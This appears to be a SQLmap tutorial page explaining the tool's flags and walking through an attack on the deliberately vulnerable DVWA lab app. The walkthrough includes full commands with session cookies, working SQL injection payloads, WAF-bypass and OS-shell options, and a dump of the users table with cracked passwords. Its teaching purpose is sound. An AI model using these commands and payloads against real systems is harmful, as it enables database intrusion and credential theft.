SQLmap • 0xnhl

SQLmap is an automated web vulnerability and SQL Injection detection and exploitation tool. It helps automate the enumeration of vulnerable applications, as well as the exploitation of SQL injection.

https://sqlmap.org ↗
SQLmap’s GitHub repository: https://github.com/sqlmapproject/sqlmap ↗.

Usage#

sqlmap [options]
OR
python sqlmap.py [options]

plaintext

Run sqlmap against a single target URL:

sqlmap [-u|--url] "http://www.example.com/vuln.php?id=1"

plaintext

Send data in a POST request (--data implies POST request):

python sqlmap.py [-u|--url] "http://www.example.com/vuln.php" --data="id=1"

plaintext

Essential & Targeting Flags#

-u <url>: Specify the target URL (e.g., sqlmap -u "http://example.com").
-r <file>: Load an HTTP request from a text file (useful for POST requests or authenticated endpoints).
-p <parameter>: Manually define the parameter(s) to test for SQL injection.
--data=<string>: Send data string through a POST request.

Scope & Testing Depth#

--level=<1-5>: Set the level of tests to perform (default 1). Increasing the level adds more payloads and checks.
--risk=<1-3>: Set the risk level of tests (default 1). Higher risk tests can include dangerous, time-consuming queries that modify/damage data.
--technique=<B|E|U|S|T|Q>: Specify the SQL injection techniques to use: Boolean, Error, UNION, Stacked, Time-based, or Query.

Enumeration Flags#

--dbs: Enumerate all databases accessible by the database user.
--tables: Enumerate all tables within a specified or current database.
--columns: Enumerate all columns within a specific table.
--schema: Enumerate the entire database schema.

Data Extraction & Dumping#

--dump: Extract all entries/rows from a specific database, table, or column.
--dump-all: Dump all available database table entries.
-D <db>: Specify the database name.
-T <table>: Specify the table name.
-C <column>: Specify the column name.

WAF & Bypass#

--tamper=<script>: Use built-in or custom scripts to obfuscate payloads and bypass Web Application Firewalls (e.g., --tamper=space2comment).

Operational Flags#

--batch: Automatically select the default answer for all prompts (skips manual user interaction).
--threads=<number>: Max number of concurrent requests (speeds up data dumping).
--os-shell: Prompt for an interactive operating system shell (allows arbitrary OS command execution).

If you don’t want to manually add the flags to each command, use the--wizard flag with SQLMap. When you use this flag, the tool will guide you through each step and ask questions to complete the scan.

The --dbs flag helps you to extract all the database names. Once you get to know the database names, you can extract information about the tables of that database by using-D database_name --tables. After obtaining the tables, if you want to enumerate the records in those tables, you can use-D database_name -T table_name --dump.

If you see any web application using GET parameters in the URLs to retrieve data, you can test that URL with the -u flag in the SQLMap tool. This is considered to be HTTP GET-based testing. This approach is followed when the application uses GET parameters in the URL to retrieve data from the searches.

You can also use POST-based testing, where the application sends data in the request’s body instead of the URL. Examples of this could be login forms, registration forms, etc. To follow this approach, you must intercept a POST request on the login or registration page and save it as a text file. Then we can use the -r flag to input that request saved in the text file to the SQLMap tool. eg: sqlmap -r intercepted_request.txt

In real-world scenarios, many web applications rely on cookies to maintain user sessions, enforce authentication, or apply access controls. When testing such applications, simply providing a URL with SQLMap may not be sufficient, as unauthenticated requests could be redirected, denied, or return different content. SQLMap supports cookie-based testing via the —cookie flag, which lets you include session cookies (such as PHPSESSID, JSESSIONID, or authentication tokens) directly in your request. This ensures that SQLMap interacts with the application in the same authenticated or authorised context as a normal user. For example, after logging into an application via a browser and capturing the session cookie, you can pass it to SQLMap using --cookie="SESSIONID=abcdef123456" to accurately test injection points that are only reachable after authentication.

Example#

Let’s take a look at a quick example of how to use SQLmap to exploit an SQL injection vulnerability. Say that a host with IP address 10.1.1.14 is vulnerable to SQL injection. In order to automate the enumeration and exploitation of this vulnerability, you first connect to the vulnerable application and capture the HTTP GET request by using a proxy. The example below shows the captured HTTP GET request. You can use this information to launch the SQLmap tool, to the vulnerable server (10.1.1.14).

HTTP GET Request to a Vulnerable Web Application

GET /dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit HTTP/1.1
Host: 10.1.1.14
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.1.1.14/dvwa/vulnerabilities/sqli/
Cookie: security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4
Connection: closeUpgrade-Insecure-Requests: 1

plaintext

The first highlighted line in Example 10-15 shows the GET request’s URI. The second highlighted line shows the cookie and the session ID (PHPSESSID=1558e11b491da91be3b68e5cce953ca4).

Using the SQLmap Tool to Exploit an SQL Injection Vulnerability

root@kali:~# sqlmap -u "http://10.1.1.14/dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit" --cookie="security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4" --dbs
        ___
       __H__
 ___ ___[']_____ ___ ___ 
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets withoutprior mutual consent is illegal. It is the end user's responsibilityto obey all applicable local, state and federal laws. Developersassume no liability and are not responsible for any misuse or damagecaused by this program
[*] starting at 21:49:11[21:49:11] 
[INFO] testing connection to the target URL
[21:49:11] [INFO] testing if the target URL content is stable
[21:49:12] [INFO] target URL content is stable
[21:49:12] [INFO] testing if GET parameter 'id' is dynamic...<output omitted for brevity>...
[21:50:12] [INFO] target URL appears to have 2 columns in query
[21:50:12] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1to 20 columns' injectable
[21:50:12] [WARNING] in OR boolean-based injection cases, pleaseconsider usage of switch '--drop-set-cookie' if you experience anyproblems during data retrievalGET parameter 'id' is vulnerable. Do you want to keep testing theothers (if any)? [y/N]sqlmap identified the following injection point(s) with a total of 201HTTP(s) requests:---Parameter: id (GET)     Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (MySQLcomment) (NOT)    Payload: id=omar' OR NOT 3391=3391#&Submit=Submit    Type: error-based    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause(FLOOR)    Payload: id=omar' OR ROW(5759,9381)>(SELECT COUNT(*),CONCAT(0x7162717871,(SELECT (ELT(5759=5759,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM (SELECT 5610 UNION SELECT 4270 UNION SELECT 5009UNION SELECT 5751)a GROUP BY x)-- AxAS&Submit=Submit    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 OR time-based blind    Payload: id=omar' OR SLEEP(5)-- dxIW&Submit=Submit    Type: UNION query    Title: MySQL UNION query (NULL) - 2 columns     Payload: id=omar' UNION ALL SELECT CONCAT(0x7162717871,0x6a4752487050494664786251457769674b666b4f74566843756e766764785546795679694159677a, 0x716a717671), NULL#&Submit=Submit---
[21:50:22] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntu 8.04 (Hardy Heron)web application technology: PHP 5.2.4, Apache 2.2.8back-end DBMS: MySQL >= 4.1
[21:50:22] [INFO] fetching database namesavailable databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195
[21:50:22] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.14'
[*] shutting down at 21:50:22

plaintext

The first four highlighted lines in Example show how SQLmap automates the various tests and payloads sent to the vulnerable application. The last few highlighted lines show how SQLmap was able to enumerate all the databases in the SQL server.

When you have a list of all available databases, you can try to retrieve the tables and records of the dvwa database by using the command shown in Example below.

Retrieving Sensitive Information from a Database

root@kali:~# sqlmap -u "http://10.1.1.14/dvwa/vulnerabilities/sqli/?id=omar&Submit=Submit" --cookie="security=low; PHPSESSID=1558e11b491da91be3b68e5cce953ca4" -D dvwa --dump-all 
___...<output omitted for brevity>...
[22:14:51] [INFO] resuming back-end DBMS 'mysql'[22:14:51] 
[INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET)     Type: boolean-based blind   Title: OR boolean-based blind - WHERE or HAVING clause (MySQLcomment) (NOT)   Payload: id=omar' OR NOT 3391=3391#&Submit=Submit     Type: error-based    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause(FLOOR)    Payload: id=omar' OR ROW(5759,9381)>(SELECT COUNT(*),CONCAT(0x7162717871,(SELECT (ELT(5759=5759,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM (SELECT 5610 UNION SELECT 4270 UNION SELECT 5009UNION SELECT 5751)a GROUP BY x)-- AxAS&Submit=Submit     Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 OR time-based blind    Payload: id=omar' OR SLEEP(5)-- dxIW&Submit=Submit    Type: UNION query    Title: MySQL UNION query (NULL) - 2 columns Payload: id=omar' UNION ALL SELECT CONCAT(0x7162717871,0x6a4752487050494664786251457769674b666b4f74566843756e766764785546795679694159677a,0x716a717671),NULL#&Submit=Submit---[22:14:52] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntu 8.04 (Hardy Heron)web application technology: PHP 5.2.4, Apache 2.2.8back-end DBMS: MySQL >= 4.1[22:14:52] [INFO] fetching tables for database: 'dvwa'[22:14:52] [WARNING] reflective value(s) found and filtering out[22:14:52] [INFO] fetching columns for table 'users' in database'dvwa'[22:14:52] [INFO] fetching entries for table 'users' in database'dvwa'
[22:14:52] [INFO] recognized possible password hashes in column'password'...<output omitted for brevity>...
[22:15:06] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[22:15:06] [INFO] starting 2 processes
[22:15:08] [INFO] cracked password 'charley' for hash'8d3533d75ae2c3966d7e0d4fcc69216b'
[22:15:08] [INFO] cracked password 'abc123' for hash'e99a18c428cb38d5f260853678922e03'
[22:15:11] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[22:15:13] [INFO] cracked password 'letmein' for hash'0d107d09f5bbe40cade3de5c71e9e9b7'
Database: dvwaTable: users[5 entries]
+---------+--------+------------------------------------------------------+---------------------------------------------+-----------+-------------+
| user_id| user | avatar | password | last_name | first_name |
+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+----------------+
| 1 | admin | http://172.16.123.129/dvwa/hackable/users/admin.jpg |5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin |
| 2 | gordonb| http://172.16.123.129/dvwa/hackable/users/gordonb.jpg|e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon |
| 3 | 1337 | http://172.16.123.129/dvwa/hackable/users/1337.jpg |8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack  |
| 4 | pablo | http://172.16.123.129/dvwa/hackable/users/pablo.jpg |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo |
| 5 | smithy | http://172.16.123.129/dvwa/hackable/users/smithy.jpg|5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob |
+---------+---------+-------------------------------------------------------+---------------------------------------------+-----------+---------------+
[22:15:17] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.14/dump/dvwa/users.csv'
[22:15:17] [INFO] fetching columns for table 'guestbook' in database'dvwa'
[22:15:17] [INFO] fetching entries for table 'guestbook' in database'dvwa'
Database: dvwaTable: guestbook[1 entry]
+------------+------+-------------------------+
| comment_id| name  | comment |
+------------+------+-------------------------+
| 1            | test | This is a test comment.|
+------------+------+-------------------------+
[22:15:17] [INFO] table 'dvwa.guestbook' dumped to CSV file '/root/.sqlmap/output/10.1.1.14/dump/dvwa/guestbook.csv'
[22:15:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.14'
[*] shutting down at 22:15:17

plaintext

The first four highlighted lines show how SQLmap was able to automatically enumerate users from the compromised database and crack their passwords.